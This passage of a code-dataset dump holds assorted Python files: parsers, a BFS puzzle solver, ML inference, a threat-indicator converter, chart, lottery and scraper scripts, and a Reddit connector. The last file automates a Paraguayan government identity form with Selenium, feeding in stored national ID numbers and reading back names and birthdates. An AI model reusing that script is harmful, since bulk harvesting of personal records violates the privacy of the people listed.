# lexlhs = lexent\n # # lexlhs[TYPE] = lexent['pos']\n # newprod = Production(lexlhs, (fltoken,))\n # productions.append(newprod)\n\n for wordtuple, featlist in lexicon.lexicon.items():\n for lexent in featlist:\n lexlhs = lexent\n newprod = Production(lexlhs, (wordtuple,))\n productions.append(newprod)\n\n return FeatureGrammar(start, productions)\n\n\ntrec = defaultdict(lambda: None)\n\ndescription = 'stems with paired raised lines or quadrangular, olive-green to purplish, rugulose-tuberculate at first' # , becoming subterete, purplish-grey and smooth or remaining rugulose'\n\ntrec['description'] = description\ntrdr = [trec]\nttaxa = AbstractFloraCorpusReader(reader=trdr)\n\nwith open('flg.fcfg', 'r', encoding='utf-8') as gf:\n gs = gf.read()\n\nttrace = 4\nof = sys.stdout\nif __name__ == '__main__':\n if False:\n ttrace = 0\n ttaxa = 
FloraCorpusReader(db=r'..\\resources\\efloras.db3',\n query=\"Select * from Taxa where genus = 'Salacia' and species = 'erecta';\", )\n of = open('testphrases.txt', 'w', encoding='utf-8')\n alltokens = [tk for taxon in ttaxa.taxa for sent in taxon.sentences for tk in sent.tokens]\n flgr = FGFlora.fromstring(gs, fltokens=alltokens)\n parser = parse.FeatureEarleyChartParser(flgr, trace=ttrace)\n for taxon in ttaxa.taxa:\n for sent in taxon.sentences:\n for i, phrase in enumerate(sent.phrases):\n # trees = list(parser.parse(phrase.tokens))\n trees = []\n chart = parser.chart_parse(tk.lexwords for tk in phrase.tokens)\n # charedges = list(chart.select(is_complete=True, lhs='CHAR'))\n # for charedge in charedges:\n # for tree in chart.trees(charedge, complete=True, tree_class=nltk.Tree):\n # trees.append(tree)\n #\n treegen = chart.parses(flgr.start(), tree_class=nltk.Tree)\n trees = list(treegen)\n if trees:\n print('Success: ' + phrase.text, file=of)\n print('No. of trees: %d' % len(trees), file=of)\n if ttrace:\n for treex in trees:\n treex.draw()\n else:\n print('Fail: ' + phrase.text, file=of)\n of.close()\n\n","repo_name":"ggosline/taxonparser","sub_path":"src/floras-nltk/floraparser/testnltk3.py","file_name":"testnltk3.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41177762747","text":"from collections import deque\nfrom sys import stdin\n\n\n# 체스 말 이동 방향\ndef next_pos():\n return [[-1, -2], [-2, -1], [-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2]]\n\n\n# BFS\ndef solution(size, cur_y, cur_x, end_y, end_x):\n visited = [[False for i in range(size)] for j in range(size)]\n visited[cur_y][cur_x] = True\n q = deque()\n q.append([cur_y, cur_x, 0])\n while len(q) > 0:\n y, x, count = q.popleft()\n # 목적지 도착 시 결과 값 반화\n if y == end_y and x == end_x:\n return count\n # 이동 가능한 위치인 경우 큐에 추가\n for ny, nx in next_pos():\n next_y, next_x = y + ny, x + nx\n if (\n 0 <= next_y < size\n and 0 <= next_x < size\n and not visited[next_y][next_x]\n ):\n visited[next_y][next_x] = True\n q.append([next_y, next_x, count + 1])\n return -1\n\n\nif __name__ == \"__main__\":\n n = int(stdin.readline())\n for _ in range(n):\n l = int(stdin.readline())\n cy, cx = map(int, stdin.readline().strip().split())\n ey, ex = map(int, stdin.readline().strip().split())\n print(solution(l, cy, cx, ey, ex))\n","repo_name":"cda2/BJ","sub_path":"python/src/bj7562.py","file_name":"bj7562.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29195429506","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport time\nfrom alexnet import alexnet_v2, alexnet_my_arg_scope\nfrom crop_image import CropImage\n\nslim = tf.contrib.slim\n\nflags = tf.app.flags\nflags.DEFINE_string('logs_dir', 'alex_batch_norm_pattern2_batch512',\n 'Directory to save the checkpoints and training summaries.')\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n \"\"\"\n Configuration Part.\n \"\"\"\n assert FLAGS.logs_dir, '`logs_dir` is missing.'\n logs_path = os.path.join('logs', FLAGS.logs_dir)\n img_path = '6P8B10G0CLZZ/6P8B10G0CLZZ5.tif'\n crop_size = [224, 224]\n num_classes = 2\n crop_image = CropImage('ng', num_classes)\n test_images = crop_image.crop_ok_image(img_path, crop_size)\n test_images = np.array(test_images)\n test_images_expanded = np.expand_dims(test_images, -1)\n print(test_images_expanded.shape)\n # convert to float batch\n # 
test_image_batch = tf.to_float(test_images_expanded)\n\n image_tensor = tf.placeholder(tf.uint8, [None, crop_size[0], crop_size[1], 1], name='InputImage')\n # Define the network\n with slim.arg_scope(alexnet_my_arg_scope(is_training=False)):\n logits, _ = alexnet_v2(tf.to_float(image_tensor), num_classes=num_classes, is_training=False)\n\n predictions = tf.argmax(logits, 1, name='output_argmax')\n # Setup the global step.\n tf.train.get_or_create_global_step()\n session_config = tf.ConfigProto()\n session_config.gpu_options.allow_growth = True\n tf.logging.set_verbosity(tf.logging.INFO)\n saver = tf.train.Saver()\n\n # Launch the graph\n with tf.Session(config=session_config) as sess:\n start_time = time.time()\n prev_model = tf.train.get_checkpoint_state(logs_path)\n if prev_model:\n saver.restore(sess, prev_model.model_checkpoint_path)\n elapsed_time = time.time() - start_time\n print('Checkpoint found, {}'.format(prev_model))\n print('restore elapsed time: {}'.format(elapsed_time))\n start_time = time.time()\n predict_array = sess.run(predictions, feed_dict={image_tensor: test_images_expanded})\n elapsed_time = time.time() - start_time\n crop_image.save_defect_image(predict_array, 'ng.jpg', crop_size)\n print(\"Prediction: {}, shape: {}\".format(predict_array, predict_array.shape))\n print('inference elapsed time: {}'.format(elapsed_time))\n\n else:\n print('No checkpoint found')\n\n # predict_array = sess.run(predictions)\n # print(\"Prediction: {}\".format(predict_array))\n\n\n\n\nif __name__ == '__main__':\n tf.app.run()","repo_name":"Newhandnew/AOI","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39420783868","text":"\n############################################################################\n# Simple blacklist to detector conversion\n############################################################################\n\nimport requests\nimport uuid\nfrom cyberprobe.indicators import Indicator, Indicators, Descriptor\nimport cyberprobe.logictree as lt\n\nclass Blacklist:\n\n def __init__(self):\n self.bl = []\n\n def read_from_file(self, file):\n\n with open(file) as f:\n for line in f:\n line = line.strip()\n if len(line) == 0: continue\n if line[0] == '#': continue\n self.bl.append(line)\n\n def read_from_url(self, url):\n\n resp = requests.get(url)\n\n if resp.status_code != 200:\n raise RuntimeError(resp.text)\n \n for line in resp.text.splitlines():\n line = line.strip()\n if len(line) == 0: continue\n if line[0] == '#': continue\n self.bl.append(line)\n\n def to_indicators(self, type=\"hostname\",\n category=\"exploit\", author=None,\n source=\"Blacklist conversion\", prob=0.7,\n description=None, version=1):\n\n inds = []\n\n for b in self.bl:\n\n des = Descriptor(category=category, author=author,\n source=source, prob=prob,\n type=type, value=b)\n if description != None:\n des.description = description\n ii = Indicator(des)\n ii.value = lt.Match(type, b)\n inds.append(ii)\n\n i = Indicators(\n version=version, description=\"Blacklist\",\n indicators=inds\n )\n\n return i\n","repo_name":"cybermaggedon/threat-exchanges","sub_path":"blacklist.py","file_name":"blacklist.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34130385207","text":"# Growth of Brazil's Population\n# Source: DataSus\nimport matplotlib.pyplot as 
plt\n\ndata = open(\"populacao_brasileira.csv\").readlines()\n\nx = [] # Population qtd array\ny = [] # Year number array\n\nfor i in range(len(data)):\n if i != 0:\n linha = data[i].split(\";\")\n x.append(int(linha[0]))\n y.append(int(linha[1]))\n# print(x) # debugging\n\nplt.bar(x, y, color=\"#e4e4e4\")\nplt.plot(x, y, color = \"k\", linestyle = \"--\")\nplt.title(\"Growt of Brazil's Population from 1980 to 2016\")\nplt.xlabel(\"Year\")\nplt.ylabel(\"Population x 100,000,000\")\nplt.savefig(\"bra_population.pdf\", dpi = 1200)\nplt.show()","repo_name":"CaduSantana/Data-Visualization-study","sub_path":"Estudo matplotlib/Population growth/Brazil_population_growth.py","file_name":"Brazil_population_growth.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5247136852","text":"#Faça um programa que ajude um jogador da MEGA SENA a criar palpites.\r\n# O programa vai perguntar quantos jogos serão gerados e vai sortear 6 números entre 1 e 60 para cada jogo, cadastrando tudo em uma lista composta.\r\n\r\nfrom random import randint\r\ntemp = list()\r\naleatorio = list()\r\nlista = []\r\ncont = 0\r\n\r\nprint('='*50)\r\nprint(f'{\"JOGA NA MEGA SENA\":^50}')\r\nprint('='*50)\r\n\r\nquant = int(input('Quantos jogos você quer gerar? '))\r\nprint('SORTEANDO {} JOGOS'.format(quant))\r\nfor p in range(0, quant):\r\n while True: ##While vai se manter até o contador atingir o valor 6, preenchendo a lista temporária com 6 números aleatórios\r\n num = randint(1, 60) ##Gerando números entre 1 e 60\r\n if num not in temp:\r\n temp.append(num) ##Se os números não estiverem em temp, ele adiciona em temp com o append\r\n cont+=1\r\n if cont >= 6: ## se temp já estiver com 6 elementos aleatórios, ele sai do laço\r\n break\r\n\r\n aleatorio = temp[:]\r\n temp.clear() ##Resetando a lista temporária\r\n cont = 0 ##Resetando o contador. 
Se ele não for resetado, ele já vai entrar no while com o cont em 6, e vai sair apenas com 1 valor aleatório\r\n print(f'Jogo {p+1}: {sorted(aleatorio)}')\r\n\r\n","repo_name":"rafaelbazolli/Python","sub_path":"Ex088.py","file_name":"Ex088.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73634833761","text":"\n\n\n\n\ndef spam():\n\n word = input()\n\n \n whitespace_count = lowercase_count = uppercase_count = symbol_count = 0\n for character in word:\n if character == '_':\n whitespace_count += 1\n elif character.islower():\n lowercase_count += 1\n elif character.isupper():\n uppercase_count += 1\n else:\n symbol_count += 1\n\n \n length = len(word)\n\n\n print(whitespace_count/length)\n print(lowercase_count/length)\n print(uppercase_count/length)\n print(symbol_count/length)\n\n\nspam()\n\n","repo_name":"cyrustabatab/KattisProgrammingProblems","sub_path":"alphabet_spam.py","file_name":"alphabet_spam.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7865959518","text":"from os import path\n\nfrom bcbio.pipeline import config_utils\nfrom bcbio.utils import safe_makedir, file_exists, get_in\nfrom bcbio.provenance import do\n\nCLEANUP_FILES = [\"Aligned.out.sam\", \"Log.out\", \"Log.progress.out\"]\n\ndef align(fastq_file, pair_file, ref_file, names, align_dir, data):\n config = data[\"config\"]\n out_prefix = path.join(align_dir, names[\"lane\"])\n out_file = out_prefix + \"Aligned.out.sam\"\n if file_exists(out_file):\n return out_file\n star_path = config_utils.get_program(\"STAR\", config)\n fastq = \" \".join([fastq_file, pair_file]) if pair_file else fastq_file\n num_cores = config[\"algorithm\"].get(\"num_cores\", 1)\n\n safe_makedir(align_dir)\n cmd = (\"{star_path} --genomeDir {ref_file} --readFilesIn {fastq} \"\n \"--runThreadN {num_cores} --outFileNamePrefix {out_prefix} \"\n \"--outReadsUnmapped Fastx --outFilterMultimapNmax 10\")\n fusion_mode = get_in(data, (\"config\", \"algorithm\", \"fusion_mode\"), False)\n if fusion_mode:\n cmd += \" --chimSegmentMin 15 --chimJunctionOverhangMin 15\"\n strandedness = get_in(data, (\"config\", \"algorithm\", \"strandedness\"),\n \"unstranded\").lower()\n if strandedness == \"unstranded\":\n cmd += \" --outSAMstrandField intronMotif\"\n run_message = \"Running STAR aligner on %s and %s.\" % (pair_file, ref_file)\n do.run(cmd.format(**locals()), run_message, None)\n return out_file\n\ndef _get_quality_format(config):\n qual_format = config[\"algorithm\"].get(\"quality_format\", None)\n if qual_format.lower() == \"illumina\":\n return \"fastq-illumina\"\n elif qual_format.lower() == \"solexa\":\n return \"fastq-solexa\"\n else:\n return \"fastq-sanger\"\n\ndef remap_index_fn(ref_file):\n \"\"\"Map sequence references to equivalent star indexes\n \"\"\"\n return path.join(path.dirname(path.dirname(ref_file)), \"star\")\n\ndef job_requirements(cores, memory):\n MIN_STAR_MEMORY = 30.0\n if not memory or cores * memory < MIN_STAR_MEMORY:\n memory = MIN_STAR_MEMORY / cores\n return cores, memory\n\nalign.job_requirements = job_requirements\n","repo_name":"porterjamesj/bcbio-nextgen","sub_path":"bcbio/ngsalign/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"32131421875","text":"from chalice import Chalice\nimport 
boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport urllib.request\nimport urllib.parse\nimport json\n\napp = Chalice(app_name='backend')\n\nSENDER = os.environ['SENDER']\nRECIPIENT = os.environ['RECIPIENT']\nSECRET_KEY = os.environ['SECRET_KEY']\n\nCHARSET = \"UTF-8\"\n\n@app.route('/users', methods=['POST'], cors=True)\ndef create_user():\n user_as_json = app.current_request.json_body\n email = app.current_request.json_body['email']\n name = app.current_request.json_body['name']\n message = app.current_request.json_body['message']\n body = (\"Nombre: {} \\r\\n\"\n \"Correo: {} \\r\\n\"\n \"Mensaje: {}\").format(name, email, message)\n recaptchaResponse = app.current_request.json_body['gRecaptcha']\n private_recaptcha = SECRET_KEY\n url = 'https://www.google.com/recaptcha/api/siteverify'\n params = urllib.parse.urlencode({\n 'secret': private_recaptcha,\n 'response': recaptchaResponse\n }).encode(\"utf-8\")\n data = urllib.request.urlopen(url, params).read()\n result = json.loads(data)\n success = result.get('success', None)\n if success:\n client = boto3.client('ses')\n response = client.send_email(\n Destination={\n 'ToAddresses': [\n RECIPIENT,\n ],\n },\n Message={\n 'Body': {\n 'Text': {\n 'Charset': CHARSET,\n 'Data': body,\n },\n },\n 'Subject': {\n 'Charset': CHARSET,\n 'Data': \"Contacto para informes.\",\n },\n },\n Source=SENDER,\n )\n return {'status': True}\n else:\n return {'status': False}\n","repo_name":"majesticness/un-cuarto","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14268724476","text":"import json\nimport csv\nimport time\nfrom PageReader import PageReader\n\n# Main class, loads config, runs the scrape, and handles scrape output\nclass SiteScraper:\n # Config data loaded from JSON\n config = None\n # Raw page scraper results\n results = {}\n # Results after analysis (collation, key counting, etc.)\n analyzed_results = {}\n\n # Loads config from a JSON file\n def load_config(self, config_path):\n json_data = open(config_path).read()\n data = json.loads(json_data)\n self.config = data\n\n # Main run function, scrapes all pages in the config and outputs results\n def run_scrape(self):\n for key, page in self.config['pages'].items():\n self.results[key] = self._get_page_reader_results(page, True)\n self._analyze_scrape()\n self._output_results()\n\n # Runs through results and counts key occurances if config has the\n # xpath target set to save the results\n def _analyze_scrape(self):\n target_results = {}\n for key, results in self.results.items():\n for result in results:\n for target, data in result.items():\n if self._should_save_results(key, target) == False:\n continue;\n if not target in target_results:\n target_results[target] = {}\n target_keys = data.keys()\n for target_key in target_keys:\n if not target_key in target_results.get(target, {}):\n target_results[target][target_key] = 0\n target_results[target][target_key] += 1\n self.analyzed_results = target_results\n\n # Determines output strategy from config and calls the function\n # prints an error if the function doesn't exist\n def _output_results(self):\n output_strategy = '_output_' + self.config['output']\n try:\n getattr(self, output_strategy)()\n except AttributeError:\n print('Expected function ' + output_strategy + ' does not exist')\n\n # Saves analyzed results by appending them to a csv file\n def _output_csv(self):\n 
print(self.analyzed_results)\n date = time.strftime(\"%m-%d-%Y %H:%M:%S\")\n for target, data in self.analyzed_results.items():\n filename = self.config['host'] + '.' + target + '.csv'\n with open(filename, 'a', newline='') as file_handle:\n writer = csv.writer(file_handle, delimiter=',')\n for key, value in data.items():\n writer.writerow([date, key, value])\n\n # Helper function to determine if the target results should be \n # included in the output\n def _should_save_results(self, key, target):\n target_config = self.config['pages'][key]['targets'][target]\n if not 'save' in target_config:\n return False\n if (target_config['save'] == False):\n return False\n return True\n\n # Calls into PageReader to scrape the site by running through each\n # page from the config, referencing urls from a previous page if specified\n def _get_page_reader_results(self, page, top_level = False):\n PageReader.config = page\n if (page['path']['type'] == 'url'):\n PageReader.config['path'] = page['path']['value']\n else:\n reference_page = page\n page_keys = page['path']['value'].split('.')\n path_values = self.results[page_keys[0]][0][page_keys[1]]\n results = []\n for path in path_values:\n reference_page['path'] = {\n 'value': str(path),\n 'type': 'url',\n }\n result = self._get_page_reader_results(reference_page);\n print(result)\n results.append(result)\n return results\n PageReader.config['schema'] = self.config['schema']\n PageReader.config['host'] = self.config['host']\n final_results = PageReader.analyze_page()\n if top_level == True:\n final_results = [final_results]\n return final_results\n\n# Load up the config and run the site scrape!\nsite_scaper = SiteScraper()\nsite_scaper.load_config('./config.json')\nresults = site_scaper.run_scrape()\n","repo_name":"gmac0/keyword-scraper","sub_path":"SiteScraper.py","file_name":"SiteScraper.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19925175713","text":"import datetime\nimport pmaw\nimport praw\nfrom enum import Enum\nfrom psaw import PushshiftAPI\nfrom sqlalchemy import desc\nfrom typing import List\n\nfrom trendr.config import (\n REDDIT_CLIENT_ID,\n REDDIT_CLIENT_SECRET,\n REDDIT_USER_AGENT,\n)\nfrom trendr.models.reddit_model import RedditComment, RedditSubmission\n\n\nclass RedditItem(Enum):\n \"\"\"\n RedditItem enum differentiates between submissions and comments\n when calling api wrappers\n \"\"\"\n\n SUBMISSION = 0\n COMMENT = 1\n\n\ndef create_praw_pmaw_api(\n client_id: str = REDDIT_CLIENT_ID,\n client_secret: str = REDDIT_CLIENT_SECRET,\n user_agent: str = REDDIT_USER_AGENT,\n) -> pmaw.PushshiftAPI:\n \"\"\"\n Create pmaw api object wrapping praw api object\n\n :param client_id: reddit api client id, defaults to REDDIT_CLIENT_ID\n :param client_secret: reddit api client secret, defaults to REDDIT_CLIENT_SECRET\n :param user_agent: reddit api user agent, defaults to REDDIT_USER_AGENT\n :raises Exception: if secrets are not found or authentication fails\n :return: pushshift api object\n \"\"\"\n\n if client_id and client_secret and user_agent:\n reddit = praw.Reddit(\n client_id=client_id,\n client_secret=client_secret,\n user_agent=user_agent,\n )\n return pmaw.PushshiftAPI(praw=reddit)\n else:\n raise Exception(\n \"Could not authenticate to Reddit because the necessary secrets were not available\"\n )\n\n\ndef create_pmaw_api() -> pmaw.PushshiftAPI:\n \"\"\"\n Create pmaw api object\n\n :return: pushshift api object\n \"\"\"\n\n 
return pmaw.PushshiftAPI()\n\n\ndef get_latest_submission_timestamp(asset_identifier: str) -> int or None:\n \"\"\"\n Returns the timestamp of the latest submission stored in the database for a given identifier\n\n :param asset_identifier: The identifier for the asset (AAPL, BTC), not a database id\n :return: A tweet id\n \"\"\"\n submission = (\n RedditSubmission.query.filter(\n RedditSubmission.text.ilike(f\"%{asset_identifier}%\")\n )\n .order_by(desc(RedditSubmission.tweeted_at))\n .first()\n )\n if submission:\n return submission.posted_at.timestamp()\n return None\n\n\ndef get_latest_comment_timestamp(asset_identifier: str) -> int or None:\n \"\"\"\n Returns the timestamp of the latest comment stored in the database for a given identifier\n\n :param asset_identifier: The identifier for the asset (AAPL, BTC), not a database id\n :return: A tweet id\n \"\"\"\n comment = (\n RedditComment.query.filter(RedditComment.text.ilike(f\"%{asset_identifier}%\"))\n .order_by(desc(RedditComment.tweeted_at))\n .first()\n )\n if comment:\n return comment.posted_at.timestamp()\n return None\n\n\ndef gather_items(\n api: pmaw.PushshiftAPI,\n item: RedditItem,\n search_str: str,\n subreddits: List[str] = None,\n **kwargs,\n) -> list:\n \"\"\"\n Gather all reddit comments/submissions from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param item: item to collect (comment or submission)\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :param limit: limit number of results to this maximum\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment or pmaw.PushshiftAPI.submission]\n \"\"\"\n\n kwargs[\"q\"] = search_str\n if subreddits:\n kwargs[\"subreddit\"] = \",\".join(subreddits)\n\n if item == RedditItem.SUBMISSION:\n # generator for submissions\n gen = api.search_submissions(**kwargs)\n elif item == RedditItem.COMMENT:\n # generator for comments\n gen = api.search_comments(**kwargs)\n\n return gen\n\n\ndef gather_submissions(**kwargs) -> list:\n \"\"\"\n Gather all reddit submissions from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.submission]\n \"\"\"\n if \"keywords\" in kwargs and \"after\" not in kwargs:\n timestamp = get_latest_submission_timestamp(kwargs[\"keywords\"][0])\n if timestamp:\n kwargs[\"after\"] = timestamp\n\n kwargs[\"item\"] = RedditItem.SUBMISSION\n return gather_items(**kwargs)\n\n\ndef gather_comments(**kwargs) -> list:\n \"\"\"\n Gather all reddit comments from subreddits between\n after and before which contain any keywords\n\n :param api: api object to use when gathering\n :param search_str: string to use as q\n :param before: limit query to content posted before timestamp\n :param after: limit query to 
content posted after timestamp\n :param subreddits: strings of subreddit names to search,\n defaults to None (search all subreddits)\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment]\n \"\"\"\n if \"keywords\" in kwargs and \"after\" not in kwargs:\n timestamp = get_latest_comment_timestamp(kwargs[\"keywords\"][0])\n if timestamp:\n kwargs[\"after\"] = timestamp\n\n kwargs[\"item\"] = RedditItem.COMMENT\n return gather_items(**kwargs)\n\n\ndef gather_items_by_id(api: pmaw.PushshiftAPI, item: RedditItem, **kwargs) -> list:\n \"\"\"\n Gather all reddit comments/submissions by their ids\n\n :param api: api object to use when gathering\n :param item: item to collect (comment or submission)\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment or pmaw.PushshiftAPI.submission]\n \"\"\"\n\n if item == RedditItem.SUBMISSION:\n # generator for submissions\n gen = api.search_submissions(**kwargs)\n elif item == RedditItem.COMMENT:\n # generator for comments\n gen = api.search_comments(**kwargs)\n\n return gen\n\n\ndef gather_submissions_by_id(**kwargs) -> list:\n \"\"\"\n Gather all reddit submissions by their ids\n\n :param api: api object to use when gathering\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.submission]\n \"\"\"\n\n kwargs[\"item\"] = RedditItem.SUBMISSION\n return gather_items_by_id(**kwargs)\n\n\ndef gather_comments_by_id(**kwargs) -> list:\n \"\"\"\n Gather all reddit comments by their ids\n\n :param api: api object to use when gathering\n :param ids: ids to collect\n :param filters: fields to collect from each matching entity,\n defaults to None (collect all attributes)\n :return: res\n :rtype: list[pmaw.PushshiftAPI.comment]\n \"\"\"\n\n kwargs[\"item\"] = RedditItem.COMMENT\n return gather_items_by_id(**kwargs)\n\n\ndef convert_time(unix_time) -> datetime:\n \"\"\"\n Returns an RFC 1123 time string from a unix timestamp\n :param unix_time: time unix_time format\n :return: time as a datetime object\n \"\"\"\n return datetime.datetime.utcfromtimestamp(unix_time)\n\n\ndef reddit_count_mentioning_asset(asset_identifier: str):\n \"\"\"\n Queries Reddit for the count of posts and comments mentioning the asset.\n :param asset_identifier: The name of the asset (AAPL, BTC, Bitcoin, etc.)\n :return: a Python dictionary with the count data(startingHour: count)\n for each hour. 
The number of hours depends on the frequncy of mentions,\n for a max of 2000 posts(can be changed by changing the POST_COUNT variable)\n but it's left at 1,000 to not exceed api limits and for speed.\n \"\"\"\n POSTS_COUNT = 1000\n psaw_api = PushshiftAPI()\n gen_subs = psaw_api.search_submissions(q=asset_identifier, limit=POSTS_COUNT)\n gen_comments = psaw_api.search_comments(q=asset_identifier, limit=POSTS_COUNT)\n\n results_comments = list(gen_comments)\n results_subs = list(gen_subs)\n\n timeDict = {}\n for i in results_comments:\n if type(i[len(i) - 1]) == float:\n time = convert_time(i[len(i) - 1])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n else:\n time = convert_time(i[len(i) - 1][\"created\"])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n\n for i in results_subs:\n if type(i[len(i) - 1]) == float:\n time = convert_time(i[len(i) - 1])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n else:\n time = convert_time(i[len(i) - 1][\"created\"])\n time2 = datetime.datetime(time.year, time.month, time.day, time.hour, 0, 0)\n if time2 not in timeDict:\n timeDict[time2] = 1\n else:\n timeDict[time2] += 1\n newDict = {}\n for key, value in timeDict.items():\n string_date_time = str(key)\n newDict[string_date_time] = value\n return newDict\n","repo_name":"ryangamble/trendr","sub_path":"trendr/connectors/reddit_connector.py","file_name":"reddit_connector.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29473459768","text":"#!/usr/bin/env python\nimport json\nfrom csv import reader as csvreader\nfrom random import randint\n\nimport responder\nimport httpx\nimport environ\nimport redis\n\n\nSRCDIR = environ.Path(__file__) - 1 # ./\n\nenv = environ.Env()\nenv.read_env(SRCDIR('env-local'))\n\ndb = redis.Redis.from_url(env('REDIS_URL'))\n\nif 'CSV_PAIRS_URL' in env:\n response = httpx.get(env('CSV_PAIRS_URL').strip(), timeout=25)\n csv = csvreader(response.text.splitlines(), delimiter=',')\n codes = dict((key.replace('-', ''), val) for key, val in csv)\n #codes = dict(csvreader('a,b\\nc,d'.splitlines(), delimiter=','))\n \napp = responder.API()\n\n\n@app.route(\"/\")\nasync def home(req, resp):\n resp.content = app.template('home.html')\n\n\n@app.route(\"/getvalue/{key}\")\nasync def get(req, resp, *, key: str):\n key = key.replace('-', '')\n if key == 'test':\n resp.media = {'value': str(randint(0, 9999))}\n elif db.get(key) == b'obtained':\n resp.media = {'error': 'Этот код уже был использован'}\n else:\n value = codes.get(key)\n if value:\n db.set(key, 'obtained') # Отметить как использованый.\n resp.media = {'value': value}\n\n \nif __name__ == '__main__':\n app.run(debug=env.bool('WEB_DEBUG', default=False), port=env('PORT', default=8000))\n","repo_name":"spbelect/doublecode","sub_path":"doublecode.py","file_name":"doublecode.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21757711313","text":"# This is a python script that removes duplicates and corrects data\n\nimport time\nimport selenium\nimport sqlite3\nfrom selenium import webdriver\nfrom 
webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\nconn = sqlite3.connect('paraguayosprueba2.db')\nc = conn.cursor()\n\n# select all rows where only cedula is distinct and order by nombres, nombres, apellidos, dia, mes, anho are the same\n\nc.execute(\"\"\"SELECT DISTINCT A.cedula, A.nombres, A.apellidos, A.dia, A.mes, A.anho\nFROM paraguayos A, paraguayos B\nWHERE A.cedula <> B.cedula\nAND A.nombres = B.nombres\nAND A.apellidos = B.apellidos\nAND A.dia = B.dia\nAND A.mes = B.mes\nAND A.anho = B.anho\nORDER BY A.nombres, A.apellidos, A.dia, A.mes, A.anho\"\"\")\n\n# create a list of tuples with the results\n\nrows = c.fetchall()\n\ncedula = 0\n\nprint(\"Existen \" + str(len(rows)) + \" registros duplicados\")\n\nprint(\"Limpiar? (y/n)\")\n\nlimpiar = input()\n\nif limpiar == \"y\":\n while True:\n try:\n driver = webdriver.Chrome(ChromeDriverManager().install())\n\n # Go to the website\n\n search_url = \"https://identidad.mtess.gov.py/alumno/register.php\"\n\n driver.get(search_url)\n\n time.sleep(3)\n\n elem = driver.find_element(By.NAME, \"value_cedula_1\")\n\n while cedula < len(rows):\n while True:\n try: \n print(\"Procesando cedula: \" + str(rows[cedula][0]))\n elem.clear()\n elem.send_keys(rows[cedula][0])\n elem.send_keys(Keys.TAB)\n\n time.sleep(3)\n\n elem2 = driver.find_element(By.ID, \"readonly_value_nombre_1\")\n nombres = elem2.get_attribute(\"value\")\n\n if(nombres != \"noencontrada\"):\n elem3 = driver.find_element(By.ID, \"readonly_value_apellido_1\")\n apellidos = elem3.get_attribute(\"value\")\n\n elem4 = driver.find_element(By.ID, \"dayvalue_fechanac_1\")\n dia = elem4.get_attribute(\"value\")\n\n elem5 = driver.find_element(By.ID, \"monthvalue_fechanac_1\")\n mes = elem5.get_attribute(\"value\")\n\n elem6 = driver.find_element(By.ID, \"yearvalue_fechanac_1\")\n anho = elem6.get_attribute(\"value\")\n\n if(nombres != rows[cedula][1] or apellidos != str(rows[cedula][2]) or dia != str(rows[cedula][3]) or mes != 